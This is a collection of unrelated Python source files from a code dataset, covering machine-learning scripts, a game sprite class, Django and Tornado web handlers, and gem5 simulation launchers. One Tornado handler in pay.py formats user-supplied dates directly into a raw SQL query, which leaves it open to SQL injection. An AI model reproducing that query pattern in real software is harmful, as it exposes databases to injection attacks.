NaiveBayesClassifier\nclassifier=NaiveBayesClassifier.train(feature_set)\nprint(nltk.classify.accuracy(classifier,test_set))\nprint(classifier.show_most_informative_features(15))\n\n\nsvm=SVC()\nclassifier_sklearn=SklearnClassifier(svm)\nrandom_forest=RandomForestClassifier()\nclassifier_sklearn_1=SklearnClassifier(random_forest)\n\n\nclassifier_sklearn.train(feature_set)\nnltk.classify.accuracy(classifier_sklearn,test_set)\n\n\nclassifier_sklearn_1.train(feature_set)\nnltk.classify.accuracy(classifier_sklearn_1,test_set)\n\n\n","sub_path":"Natural_Language_Processing/f-02.py","file_name":"f-02.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"355533797","text":"import pyglet\n\nclass AnimatedSprite(pyglet.sprite.Sprite):\n ''' Sprite subclass providing advanced\n playback controls for animated sprites '''\n\n def __init__(self,\n img, x=0, y=0,\n blend_src=pyglet.gl.GL_SRC_ALPHA,\n blend_dest=pyglet.gl.GL_ONE_MINUS_SRC_ALPHA,\n batch=None,\n group=None,\n usage='dynamic'):\n pyglet.sprite.Sprite.__init__(self, img, x, y, blend_src, blend_dest, batch, group, usage)\n\n self._paused = False\n self._range = (0, 1)\n\n def _animate(self, dt):\n self._frame_index += 1\n if self._frame_index >= self.range[1]:\n self._frame_index = self.range[0]\n self.dispatch_event('on_animation_end')\n\n frame = self._animation.frames[self._frame_index]\n self._set_texture(frame.image.get_texture())\n\n if frame.duration != None:\n pyglet.clock.schedule_once(self._animate, frame.duration)\n else:\n self.dispatch_event('on_animation_end')\n\n def set_frame(self, i):\n ''' Seek to the specified frame '''\n self._frame_index = max(self.range[0], min(self.range[1], i))\n frame = self._animation.frames[self._frame_index]\n\n pyglet.clock.unschedule(self._animate)\n self._animate(0.0)\n\n def set_loop(self, begin, end):\n ''' Loop between the begin and end frames '''\n\n self.range = (begin, end)\n\n if self._frame_index < begin:\n self._frame_index = begin-1\n\n pyglet.clock.unschedule(self._animate)\n self._animate(0.0)\n\n def pause(self):\n ''' pause animation playback '''\n if not self._paused:\n frame = self._animation.frames[self._frame_index]\n self._animate(frame.duration)\n pyglet.clock.unschedule(self._animate)\n self._paused = True\n\n def play(self):\n ''' resume animation playback '''\n if self._paused:\n frame = self._animation.frames[self._frame_index]\n self._animate(frame.duration)\n self._paused = False","sub_path":"map/animatedsprite.py","file_name":"animatedsprite.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407689261","text":"\"\"\"\nCopyright 2018 Google LLC\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n https://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\"\"\" Downloads models and datasets for imagenet\n\n Content downloaded:\n - Imagenet images for the zebra class.\n - Full Broden dataset(http://netdissect.csail.mit.edu/)\n - Inception 5h model(https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/inception5h.py)\n - Mobilenet V2 model(https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet_v1.md)\n\n Functionality:\n - Downloads open source models(Inception and Mobilenet)\n - Downloads the zebra class from imagenet, to illustrate a target class\n - Extracts three concepts from the Broden dataset(striped, dotted, zigzagged)\n - Structures the data in a format that can be readily used by TCAV\n - Creates random folders with examples from Imagenet. Those are used by TCAV.\n\n Example usage:\n\n python download_and_make_datasets.py --source_dir=YOUR_FOLDER --number_of_images_per_folder=50 --number_of_random_folders=10\n\"\"\"\nimport subprocess\nimport os\nimport argparse\nfrom tensorflow.io import gfile\nimport imagenet_and_broden_fetcher as fetcher\nimport tensorflow as tf\nimport logging\n\ndef make_concepts_targets_and_randoms(source_dir, number_of_images_per_folder, number_of_random_folders):\n \n logging.basicConfig(filename=source_dir+'/logger.log', level=logging.INFO)\n \n # Run script to download data to source_dir\n if not gfile.exists(source_dir):\n gfile.makedirs(source_dir)\n if not gfile.exists(os.path.join(source_dir,'broden1_224/')) or not gfile.exists(os.path.join(source_dir,'inception5h')):\n subprocess.call(['bash' , 'FetchDataAndModels.sh', source_dir])\n \n \n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n all_class = imagenet_dataframe[\"class_name\"].values.tolist()\n\n # Determine classes that we will fetch\n imagenet_classes = ['fire engine']\n broden_concepts = ['striped', 'dotted', 'zigzagged']\n random_except_concepts = ['zebra','fire engine']\n except_words = ['cat', 'shark', 'apron', 'dogsled','dumbbell','ball','bus']\n for e_word in except_words:\n random_except_concepts.extend([element for element in all_class if e_word == str(element)[-len(e_word):]])\n \n tf.logging.info('imagenet_classe %s' % imagenet_classes)\n tf.logging.info('concepts %s' % broden_concepts)\n tf.logging.info('random_except_concepts %s' % random_except_concepts)\n\n for image in imagenet_classes:\n fetcher.fetch_imagenet_class(source_dir, image, number_of_images_per_folder, imagenet_dataframe)\n # Make concepts from broden\n for concept in broden_concepts:\n fetcher.download_texture_to_working_folder(broden_path=os.path.join(source_dir, 'broden1_224'),\n saving_path=source_dir,\n texture_name=concept,\n number_of_images=number_of_images_per_folder)\n\n # Make random folders. If we want to run N random experiments with tcav, we need N+1 folders.\n # (変更) 除外するクラスを指定\n fetcher.generate_random_folders(\n working_directory=source_dir,\n random_folder_prefix=\"random500\",\n number_of_random_folders=number_of_random_folders+1,\n number_of_examples_per_folder=number_of_images_per_folder,\n imagenet_dataframe=imagenet_dataframe,\n random_except_concepts = random_except_concepts\n )\n\ndef make_targets(source_dir, number_of_images_per_folder):\n\n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n all_class = imagenet_dataframe[\"class_name\"].values.tolist()\n\n # Determine classes that we will fetch\n imagenet_classes = ['soccer ball']\n\n for image in imagenet_classes:\n fetcher.fetch_imagenet_class(source_dir, image, number_of_images_per_folder, imagenet_dataframe)\n\n\ndef make_randoms(source_dir, number_of_images_per_folder, number_of_random_folders):\n\n logging.basicConfig(filename=source_dir+'/logger.log', level=logging.INFO)\n\n # Run script to download data to source_dir\n if not gfile.exists(source_dir):\n gfile.makedirs(source_dir)\n if not gfile.exists(os.path.join(source_dir,'broden1_224/')) or not gfile.exists(os.path.join(source_dir,'inception5h')):\n subprocess.call(['bash' , 'FetchDataAndModels.sh', source_dir])\n\n\n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n\n # Make random folders. If we want to run N random experiments with tcav, we need N+1 folders.\n fetcher.generate_random_folders(\n working_directory=source_dir,\n random_folder_prefix=\"random50\",\n number_of_random_folders=number_of_random_folders+1,\n number_of_examples_per_folder=number_of_images_per_folder,\n imagenet_dataframe=imagenet_dataframe\n )\n\n\ndef make_imagent_color_concept(source_dir, number_of_images_per_folder):\n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n color_lst = ['red','yellow','blue','green']\n fetcher.fetch_imagenet_class_color(source_dir,\n number_of_images_per_folder,\n imagenet_dataframe,\n folder_prefix=\"imagenet\",\n color_lst=color_lst\n )\n\ndef make_imagent_fix_color_concept(source_dir, number_of_images_per_folder):\n # make targets from imagenet\n imagenet_dataframe = fetcher.make_imagenet_dataframe(\"/home/tomohiro/code/tcav/tcav/tcav_examples/image_models/imagenet/imagenet_url_map.csv\")\n color_lst = ['red','yellow','blue','green','purple']\n #color_lst = ['purple']\n fetcher.fetch_imagenet_class_color_fixed(source_dir,\n number_of_images_per_folder,\n imagenet_dataframe,\n folder_prefix=\"imagenet\",\n color_lst=color_lst\n )\n\n\nif __name__ == '__main__':\n tf.get_logger().setLevel('INFO')\n parser = argparse.ArgumentParser(description='Create examples and concepts folders.')\n parser.add_argument('--source_dir', type=str,\n help='Name for the directory where we will create the data.')\n parser.add_argument('--number_of_images_per_folder', type=int,\n help='Number of images to be included in each folder')\n parser.add_argument('--number_of_random_folders', type=int,\n help='Number of folders with random examples that we will generate for tcav')\n\n args = parser.parse_args()\n # create folder if it doesn't exist\n if not gfile.exists(args.source_dir):\n gfile.makedirs(os.path.join(args.source_dir))\n print(\"Created source directory at \" + args.source_dir)\n # # Make data\n # make_concepts_targets_and_randoms(args.source_dir, args.number_of_images_per_folder, args.number_of_random_folders)\n # print(\"Successfully created data at \" + args.source_dir)\n\n # Make random\n make_randoms(args.source_dir, args.number_of_images_per_folder, args.number_of_random_folders)\n print(\"Successfully created data at \" + args.source_dir)\n\n # # Make target data\n # make_targets(args.source_dir, args.number_of_images_per_folder)\n # print(\"Successfully created data at \" + args.source_dir)\n\n #make_imagent_color_concept(args.source_dir, args.number_of_images_per_folder)\n\n # make_imagent_fix_color_concept(args.source_dir, args.number_of_images_per_folder)","sub_path":"tcav/tcav_examples/image_models/imagenet/download_and_make_datasets.py","file_name":"download_and_make_datasets.py","file_ext":"py","file_size_in_byte":8548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175484439","text":"#coding:utf-8\n\nfrom handler.base import BaseHandler\nfrom common.settings import TWebType, TPayPolicy\nfrom common.dao import PayAccount, WebType, PayPolicy, PayRecord\nfrom utils.usual import parse_argument, FixedForm, D\nfrom utils.encoder import TPayPolicyEncoder, PayRecordStatEncoder\nfrom wtforms.fields import IntegerField, StringField, FloatField\nfrom wtforms.validators import Required\nfrom sqlalchemy import func, text\nfrom common.settings import TPayRecord\nfrom datetime import datetime, timedelta\n\n\nclass WebTypeHandler(BaseHandler):\n class PostForm(FixedForm):\n location = StringField(validators=[Required()])\n name = StringField(validators=[Required()])\n @parse_argument(PostForm)\n def post(self):\n web_type_id = WebType.create(self, **self.arguments)\n self.write_json({'web_type_id': web_type_id})\n\n class DeleteForm(FixedForm):\n web_type_id = IntegerField(validators=[Required()])\n @parse_argument(DeleteForm)\n def delete(self):\n WebType.delete(self, **self.arguments)\n self.handle_success()\n\n class PutForm(FixedForm):\n web_type_id = IntegerField(validators=[Required()])\n name = StringField(validators=[Required()])\n @parse_argument(PutForm)\n def put(self):\n TWebType.update(self, **self.arguments)\n self.handle_success()\n\n\nclass PayPolicyHandler(BaseHandler):\n class GetForm(FixedForm):\n web_type_id = IntegerField(validators=[Required()])\n @parse_argument(GetForm)\n def get(self):\n policys = self.session.query(TPayPolicy).filter_by(**self.arguments).all()\n self.write_json({'policys': policys}, encoder=TPayPolicyEncoder)\n\n class PostForm(FixedForm):\n price = FloatField(validators=[Required()])\n time = FloatField(validators=[Required()])\n ends = IntegerField(validators=[Required()])\n label = StringField(validators=[Required()])\n expired = StringField()\n web_type_id = IntegerField(validators=[Required()])\n location = StringField(validators=[Required()])\n mask = IntegerField(validators=[Required()])\n isguest = IntegerField(default=0)\n @parse_argument(PostForm)\n def post(self):\n pay_policy_id = PayPolicy.create(self, **self.arguments)\n self.write_json({'pay_policy_id': pay_policy_id})\n\n class DeleteForm(FixedForm):\n pay_policy_id = IntegerField(validators=[Required()])\n @parse_argument(DeleteForm)\n def delete(self):\n PayPolicy.delete(self, **self.arguments)\n self.handle_success()\n\n class PutForm(FixedForm):\n pay_policy_id = IntegerField(validators=[Required()])\n price = FloatField(validators=[Required()])\n time = FloatField(validators=[Required()])\n ends = IntegerField(validators=[Required()])\n expired = StringField(validators=[Required()])\n @parse_argument(PutForm)\n def put(self):\n PayPolicy.update(self, **self.arguments)\n self.handle_success()\n\n\nclass PayAccountHandler(BaseHandler):\n class PutForm(FixedForm):\n location = StringField(validators=[Required()])\n seller_id = StringField(validators=[Required()])\n partner = StringField(validators=[Required()])\n key = StringField(validators=[Required()])\n rsa_private_key_url = StringField(validators=[Required()])\n platform = StringField(validators=[Required()])\n @parse_argument(PutForm)\n def put(self):\n PayAccount.update(self, **self.arguments)\n self.handle_success()\n\n\nclass PayRecordHandler(BaseHandler):\n class GetForm(FixedForm):\n page = IntegerField(default=1)\n page_size = IntegerField(default=50)\n location = StringField(validators=[Required()])\n @parse_argument(GetForm)\n def get(self):\n self.arguments['_location'] = self.arguments.pop('location')\n self.arguments['status'] = 'SUCCESS'\n _paginate = PayRecord.paginate(self, **self.arguments)\n self.data.update({'paginate': _paginate})\n self.data.update({'page': self.arguments['page']})\n table = self.render_string('block_pay_record.html', **self.data)\n paginate = self.render_string('block_pay_record_paginate.html', **self.data)\n self.write_json({'table': table, 'paginate': paginate})\n\n\nclass PayRecordSearchHandler(BaseHandler):\n class GetForm(FixedForm):\n keyword = StringField(validators=[Required()])\n location = StringField(validators=[Required()])\n @parse_argument(GetForm)\n def get(self):\n _paginate = PayRecord.search(self, self.arguments['keyword'], self.arguments['location'])\n self.data.update({'paginate': _paginate})\n self.data.update({'page': 1})\n table = self.render_string('block_pay_record.html', **self.data)\n paginate = self.render_string('block_pay_record_paginate.html', **self.data)\n self.write_json({'table': table, 'paginate': paginate})\n\n\nclass PayRecordStatHandler(BaseHandler):\n class GetForm(FixedForm):\n fee = StringField(filters=[lambda x: x.split(',') if x else [], lambda x: map(D, x)])\n platform = StringField(filters=[lambda x: x.split(',')])\n start = StringField()\n end = StringField()\n location = StringField(validators=[Required()], filters=[lambda x: [x]])\n web_type_id = StringField(filters=[lambda x: x.split(',') if x else [], lambda x: map(D, x)])\n @parse_argument(GetForm)\n def get(self):\n filters = lambda x: [TPayRecord.ctime.like(x)]\n current = datetime.now()\n if current.month == 1:\n month = 12\n year = current.year - 1\n else:\n month = current.month - 1\n year = current.year\n last = datetime(year=year, month=month, day=1)\n current_like = '{}%'.format(current.strftime('%Y-%m'))\n last_like = '{}%'.format(last.strftime('%Y-%m'))\n q = self.session.query(func.sum(TPayRecord.fee)).filter_by(status='SUCCESS')\n _current = q\n _last = q\n _total = q\n if self.arguments['start'] == self.arguments['end']:\n _current = _current.filter(*filters(current_like))\n _last = _last.filter(*filters(last_like))\n start = self.arguments.pop('start', None)\n end = self.arguments.pop('end', None)\n self.arguments['_location'] = self.arguments.pop('location')\n filters = [getattr(TPayRecord, k).in_(self.arguments[k]) for k in self.arguments]\n _current = _current.filter(*filters)\n _last = _last.filter(*filters)\n _total = _total.filter(*filters)\n if start and end:\n start_date = datetime.strptime(start, '%Y-%m-%d')\n end_date = datetime.strptime(end, '%Y-%m-%d')\n last_start_date = start_date - (end_date - start_date)\n last_end_date = start_date - timedelta(days=1)\n _current = _current.filter(text(\"date_format(ctime, '%Y-%m-%d') between '{}' and '{}'\".format(start, end)))\n _last = _last.filter(text(\"date_format(ctime, '%Y-%m-%d') between '{}' and '{}'\".format(last_start_date,\n last_end_date)))\n C = lambda x: 0 if x is None else x\n receipt = {'current': C( _current.one()[0]), 'last': C(_last.one()[0]), 'total': C(_total.one()[0])}\n self.write_json(receipt, encoder=PayRecordStatEncoder)\n","sub_path":"core/handler/pay.py","file_name":"pay.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60228462","text":"import tensorflow as tf\nimport os\nimport cv2\nimport numpy as np\nimport sys\n\nfrom model_design import model_design_nn\nimport config\nfrom data_prepare import data_loader\n\n\n\nif __name__=='__main__':\n\n images = tf.placeholder(dtype=tf.float32, shape=[None, config.img_h, config.img_w, config.img_ch])\n\n net_out = model_design_nn.cls_net(images, is_training=False)\n scores = tf.keras.layers.Softmax()(net_out)\n\n sess = tf.Session()\n saver = tf.train.Saver(max_to_keep=3)\n model_save_dir = './run_output'\n ckpt_path = tf.train.latest_checkpoint(model_save_dir)\n print('latest_checkpoint_path: ', ckpt_path)\n if ckpt_path is not None:\n saver.restore(sess, ckpt_path)\n else:\n print('ckpt not exists, task over!')\n exit(0)\n\n with sess.as_default():\n img_dir = './data/cls_crop_result_on_real'\n img_fn_list = os.listdir(img_dir)\n correct_cnt = 0\n for idx, img_fn in enumerate(img_fn_list):\n print('----------------- img_fn: %s'%img_fn)\n img_fpath = os.path.join(img_dir, img_fn)\n img_data = data_loader.preprocess(img_fpath)\n _images = np.expand_dims(img_data, axis=0)\n print('_images shape: ', images.shape)\n\n _scores = sess.run(scores, feed_dict={images: _images})\n\n print(_scores.shape)\n print(_scores)\n bg_prob, seat_belt_prob = _scores[0]\n if bg_prob > seat_belt_prob:\n cls_res = 0\n print('### BG: ', bg_prob)\n else:\n cls_res = 1\n print('### Seat_belt: ', seat_belt_prob)\n if cls_res == int(img_fn.startswith('pos_')):\n correct_cnt += 1\n else:\n # title = 'pos' if cls_res==1 else 'neg'\n # cv2.imshow('result_%s'%title, cv2.imread(img_fpath))\n # cv2.waitKey(0)\n print('######################################################### WRONG !!!')\n print('predict_result {}/{}'.format(str(correct_cnt), str(idx+1)))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"lc_eval.py","file_name":"lc_eval.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444249166","text":"import pymysql.cursors\nimport pandas as pd\nimport datetime\n\n\n# pymysql 을 이용하기 위한 접근 연결\n## mysql connection 정보 입력\nhostname = '127.0.0.1'\nport = 3306\nusername = 'root'\npassword = 'myPassWord'\ndefaultSchema = ''\n##########################\n\nconnection = pymysql.connect(host=hostname,\n port=port,\n user=username,\n password=password,\n db=defaultSchema,\n charset='utf8')\n\n############################################################\ntry:\n with connection.cursor() as cursor: #pymysql 문법. cursor 가 db 와의 연결점이다.\n\n res = pd.DataFrame({'A':[],'B':[], 'C':[], 'D' : [], 'E':[],'F':[],'G':[]})\n\n for i in range(19):\n # 신규 결제 학생수\n sql = '''\n \n '''\n cursor.execute(sql)\n A = cursor.fetchall()\n\n sql = '''\n \n '''\n cursor.execute(sql, )\n B = cursor.fetchall()\n\n sql = '''\n \n '''\n cursor.execute(sql)\n C = cursor.fetchall()\n\n sql = '''\n \n '''\n cursor.execute(sql)\n D = cursor.fetchall()\n\n\n row = pd.DataFrame([[A,B,C,D]],\n columns=['A', 'B', 'C','D'])\n res = pd.concat([res, row])\n res.to_csv(\"csv/test.csv\", mode=\"w\", encoding='EUC-KR')\nexcept Exception as e:\n print(e)\nfinally:\n connection.close()","sub_path":"pandasComplex.py","file_name":"pandasComplex.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274936859","text":"from django.http import Http404\nfrom CC.models import Product, Category\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom user.models import SearchHistory\n\n\ndef search(request):\n org_query = request.GET.get(\"leit\")\n if org_query is None:\n return redirect(\"/\")\n query = org_query.split(\" \")\n all_products = Product.objects.all()\n prod_list = list(all_products.filter(name__icontains=org_query, status=True))\n for word in query:\n result = list(all_products.filter(name__icontains=word, status=True)) + \\\n list(all_products.filter(description__icontains=word, status=True))\n for product in result:\n if product not in prod_list:\n prod_list.append(product)\n if request.user.is_authenticated:\n s = SearchHistory(user=request.user, search_query=org_query)\n s.save()\n all = Category.objects.all()\n category_sidebar = get_category_sidebar(all)\n\n return render(request,\n \"product_list/prod_list.html\",\n context={\n \"header\": \"Leit:\",\n \"prod_list\": prod_list,\n \"search\": True,\n \"query\": \"'{}'\".format(org_query),\n \"categories\": category_sidebar,\n \"sidebars\": True,\n \"filter\": \"Flokkar\"\n })\n\n\ndef _get_parent(category, url_string=\"\"):\n if category is None:\n return url_string\n return _get_parent(category.parent, url_string) + \"/\" + category.URL_keyword\n\n\ndef _does_cat_exist(category):\n try:\n get_object_or_404(Category, URL_keyword=category)\n return True\n except Http404:\n return False\n\n\ndef _is_complete_url(cat, url):\n # gets a category and a list of urls\n # and recursively checks if they are the same\n # cat acts like a singly linked list, a category only knows its parent (node knows next)\n if not url and cat is None:\n return True\n if not url:\n return False\n if cat is None:\n return False\n if cat.URL_keyword == url[-1]:\n return _is_complete_url(cat.parent, url[:-1])\n return False\n\n\n#_get_sub_categories is a cool function\n# because categories sort of act like a singly linked list( a category only knows its parent)\n# I have to recursively create a list of dictionaries, which has category as key and lists of dictionaries as values\n# [{category_obj: [{sub_category_obj: [{sub_sub_category_obj: []}]}]}]\n# It's a neat way of creating the filter sidebar by using the categories as filters\ndef _get_sub_categories(category, all):\n cat_list = list(all.filter(parent=category))\n if not cat_list:\n return []\n temp_list = []\n for sub in cat_list:\n if sub.status:\n temp_list.append({sub: _get_sub_categories(sub, all)})\n return temp_list\n\n\ndef get_category_sidebar(all): # used in search, serves categories as a sidebar\n # with each category that has children having a \"+\" which activates a dropdown\n cat1 = all.get(URL_keyword=\"leikjatolvur\")\n cat2 = all.get(URL_keyword=\"leikir\")\n cat3 = all.get(URL_keyword=\"aukahlutir\")\n return {\n cat1: _get_sub_categories(cat1, all),\n cat2: _get_sub_categories(cat2, all),\n cat3: _get_sub_categories(cat3, all)\n }\n\n\ndef category(request, hierarchy): # the \"hierarchy\" parameter needs to be there even though it is not used.\n categories = request.path_info.split(\"/\")[2:]\n if categories[-1] == \"\":\n categories = categories[:-1]\n\n last_url = categories[-1]\n all = Category.objects.all()\n try:\n cat = all.get(URL_keyword=last_url)\n except:\n raise Http404\n\n if not cat.status: # if the category is disabled\n raise Http404\n\n if _is_complete_url(cat, categories):\n elder = get_object_or_404(Category, URL_keyword=categories[0])\n elder_subs = {}\n for sub_cat in _get_sub_categories(elder, all):\n for sub_cat_name, children in sub_cat.items():\n elder_subs[sub_cat_name] = children\n\n header = cat.name\n order_no = request.GET.get(\"rodun\")\n if order_no:\n order = \"\"\n # this is for getting the order by correct\n # \"name\" orders by name ascending, \"-name\" orders by name descending\n if order_no == \"1\":\n order = \"name\"\n elif order_no == \"2\":\n order = \"-name\"\n elif order_no == \"3\":\n order = \"-total\"\n elif order_no == \"4\":\n order = \"total\"\n the_list = list(Product.objects.filter(category=cat, status=True).order_by(order))\n else:\n the_list = list(Product.objects.filter(category=cat, status=True).order_by(\"total\"))\n return render(request,\n \"product_list/prod_list.html\",\n context={\n \"header\": header,\n \"prod_list\": the_list,\n \"categories\": elder_subs,\n \"parent\": \"\",\n \"sidebars\": True,\n \"filter\": \"Filter\"\n })\n else:\n if _does_cat_exist(last_url):\n new_url_string = \"/flokkur\" + _get_parent(cat)\n return redirect(new_url_string)\n","sub_path":"app/product_list/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"202416476","text":"import argparse\r\nimport importlib\r\n\r\nparser = argparse.ArgumentParser(description='Project Euler solutions written in Python 3.')\r\nparser.add_argument('solution', metavar='S', type=str, help='The solution to run')\r\nargs = parser.parse_args()\r\n\r\n# Add leading zeroes to solution argument if necessary\r\nsolution_input = args.solution\r\nwhile len(solution_input) < 3:\r\n solution_input = '0' + solution_input\r\n\r\n# Import the solution script\r\nsolution = None\r\n# noinspection PyBroadException\r\ntry:\r\n solution = importlib.import_module(f'solutions.{solution_input}')\r\nexcept ModuleNotFoundError:\r\n print(f'Couldn\\'t find module: solutions.{solution_input}')\r\n exit(1)\r\n\r\n# Run the solution and print the answer it returns\r\nanswer = solution.solution()\r\nprint(answer)\r\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95030718","text":"#!/usr/bin/env python3\n\n# This is a job launch script for GAPBS tests with gem5-20\n\nimport os\nimport sys\nfrom uuid import UUID\nfrom itertools import starmap\nfrom itertools import product\n\nfrom gem5art.artifact.artifact import Artifact\nfrom gem5art.run import gem5Run\nfrom gem5art.tasks.tasks import run_gem5_instance\n\npacker = Artifact.registerArtifact(\n command = '''wget https://releases.hashicorp.com/packer/1.4.3/packer_1.4.3_linux_amd64.zip;\n unzip packer_1.4.3_linux_amd64.zip;\n ''',\n typ = 'binary',\n name = 'packer',\n path = 'disk-image/packer',\n cwd = 'disk-image',\n documentation = 'Program to build disk images. Downloaded sometime in August from hashicorp.'\n)\n\nexperiments_repo = Artifact.registerArtifact(\n command = 'git clone https://github.com/darchr/gem5art-experiments.git',\n typ = 'git repo',\n name = 'gapbs-test',\n path = './',\n cwd = '../',\n documentation = 'main experiments repo to run GAPBS with gem5'\n)\n\ngem5_repo = Artifact.registerArtifact(\n command = 'git clone https://gem5.googlesource.com/public/gem5',\n typ = 'git repo',\n name = 'gem5',\n path = 'gem5/',\n cwd = './',\n documentation = 'cloned gem5 from googlesource and checked out release-staging-v20.0.0.0 (May 6th, 2020)'\n)\n\nm5_binary = Artifact.registerArtifact(\n command = 'scons build/x86/out/m5',\n typ = 'binary',\n name = 'm5',\n path = 'gem5/util/m5/build/x86/out/m5',\n cwd = 'gem5/util/m5',\n inputs = [gem5_repo,],\n documentation = 'm5 utility for gem5-20'\n)\n\ndisk_image = Artifact.registerArtifact(\n command = './packer build gapbs.json',\n typ = 'disk image',\n name = 'gapbs',\n cwd = 'disk-image',\n path = 'disk-image/gapbs-image/gapbs',\n inputs = [packer, experiments_repo, m5_binary,],\n documentation = 'Ubuntu with m5 binary installed and root auto login'\n)\n\ngem5_binary = Artifact.registerArtifact(\n command = '''cd gem5;\n git checkout 003c08418f841e6697b1b;\n scons build/X86/gem5.opt -j20\n ''',\n typ = 'gem5 binary',\n name = 'gem5',\n cwd = 'gem5/',\n path = 'gem5/build/X86/gem5.opt',\n inputs = [gem5_repo,],\n documentation = 'gem5 binary based on googlesource/release-staging-v20.0.0.0'\n)\n\ngem5_binary_MESI_Two_Level = Artifact.registerArtifact(\n command = '''cd gem5;\n git checkout d40f0bc579fb8b10da7181;\n scons build/X86_MESI_Two_Level/gem5.opt --default=X86 PROTOCOL=MESI_Two_Level SLICC_HTML=True -j8\n ''',\n typ = 'gem5 binary',\n name = 'gem5',\n cwd = 'gem5/',\n path = 'gem5/build/X86_MESI_Two_Level/gem5.opt',\n inputs = [gem5_repo,],\n documentation = 'gem5 binary based on googlesource (Feb. 20, 2020)'\n)\n\nlinux_repo = Artifact.registerArtifact(\n command = '''git clone https://github.com/torvalds/linux.git;\n mv linux linux-stable''',\n typ = 'git repo',\n name = 'linux-stable',\n path = 'linux-stable/',\n cwd = './',\n documentation = 'linux kernel 5.3.2 source code repo obtained in November 2019'\n)\n\n\nlinux_binaries = Artifact.registerArtifact(\n name = 'vmlinux-5.2.3',\n typ = 'kernel',\n path = 'linux-stable/vmlinux-5.2.3',\n cwd = 'linux-stable/',\n command = '''git checkout v5.2.3;\n cp ../linux-configs/config.5.2.3 .config;\n make -j20;\n cp vmlinux vmlinux-5.2.3;\n ''',\n inputs = [experiments_repo, linux_repo,],\n documentation = \"Kernel binary for 5.2.3 with simple \"\n \"config file\",\n )\n\nif __name__ == \"__main__\":\n\n num_cpus = ['1', '2', '4']\n workloads = ['bc', 'bfs', 'cc', 'sssp', 'tc','pr']\n sizes = ['3', '15', '20']\n cpu_types = ['kvm', 'atomic', 'simple', 'o3']\n graphs = ['roadU.sg', 'webU.sg']\n mem_types = ['classic', 'MI_example','MESI_Two_Level']\n\n def createRun_synthetic(cpu, num_cpu, mem, workload,size):\n\n if mem == 'MESI_Two_Level':\n binary_gem5 = 'gem5/build/X86_MESI_Two_Level/gem5.opt'\n artifact_gem5 = gem5_binary_MESI_Two_Level\n else:\n binary_gem5 = 'gem5/build/X86/gem5.opt'\n artifact_gem5 = gem5_binary\n\n return gem5Run.createFSRun(\n 'Running GAPBS with gem5-20',\n binary_gem5,\n 'configs-gapbs-tests/gapbs_config.py',\n 'results/run_exit/vmlinux-5.2.3/gapbs/{}/{}/{}/{}/synthetic/{}'.\n format(cpu, num_cpu, mem ,workload, size),\n artifact_gem5, gem5_repo, experiments_repo,\n 'linux-stable/vmlinux-5.2.3',\n 'disk-image/gapbs-image/gapbs',\n linux_binaries, disk_image, cpu, num_cpu, mem ,workload, '1', size,\n timeout = 6*60*60\n )\n\n def createRun_realGraph(cpu, num_cpu, mem, workload,graph):\n\n if mem == 'MESI_Two_Level':\n binary_gem5 = 'gem5/build/X86_MESI_Two_Level/gem5.opt'\n artifact_gem5 = gem5_binary_MESI_Two_Level\n else:\n binary_gem5 = 'gem5/build/X86/gem5.opt'\n artifact_gem5 = gem5_binary\n\n return gem5Run.createFSRun(\n 'Running GAPBS with gem5-20',\n binary_gem5,\n 'configs-gapbs-tests/gapbs_config.py',\n 'results/run_exit/vmlinux-5.2.3/gapbs/{}/{}/{}/{}/real_graph/{}'.\n format(cpu, num_cpu, mem ,workload, size),\n artifact_gem5, gem5_repo, experiments_repo,\n 'linux-stable/vmlinux-5.2.3',\n 'disk-image/gapbs-image/gapbs',\n linux_binaries, disk_image, cpu, num_cpu, mem ,workload, '0', graph,\n timeout = 6*60*60\n )\n\n # For the cross product of tests, create a run object.\n runs = starmap(createRun_synthetic, product(cpu_types, num_cpus, mem_types,workloads,sizes))\n # Run all of these experiments in parallel\n for run in runs:\n run_gem5_instance(run, os.getcwd(),)\n\n runs = starmap(createRun_realGraph, product(cpu_types, num_cpus, mem_types,workloads,graphs))\n # Run all of these experiments in parallel\n for run in runs:\n 